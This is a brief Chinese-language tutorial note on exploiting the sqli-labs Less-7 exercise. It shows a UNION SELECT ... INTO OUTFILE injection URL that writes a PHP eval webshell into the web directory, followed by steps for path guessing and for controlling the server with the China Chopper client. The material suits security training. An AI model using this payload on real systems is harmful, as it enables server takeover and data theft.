条件
当SQL注入时没有显示输出,也没有报错输出;但是在每个网页打开时,都会将输入的语句写入到一个文件中。
思路
利用上述条件可以将输入的sql语句写成一个一句话木马通过访问网站将一句话木马写入到后端文件中,进而通过中国菜刀进行进一步控制
步骤
- 依旧进行试验,得到闭合
- 测试列数
- 找到路径
- 写入木马(一定要找到具有写的权限的路径)
- 利用中国菜刀进行控制
- 进入网页所在的服务器
- 得到数据
- 一句话木马
<?php @eval($_POST[123]);?>
POST代表连接的菜刀,123是密码
- 猜测路径:用 @@datadir 安装路径,@@basedir 是mysql文件储存路径,替换2或3的位置,来猜路径
实操
sql注入一句话木马
http://192.168.1.129/sqli-labs-master/Less-7/?id=-1')) union all select 1,'<?php @eval($_POST[123]);?>',3 into outfile '/var/www/sqli-labs-master/Less-7/111.php
- 利用菜刀进行连接
进入文件修改数据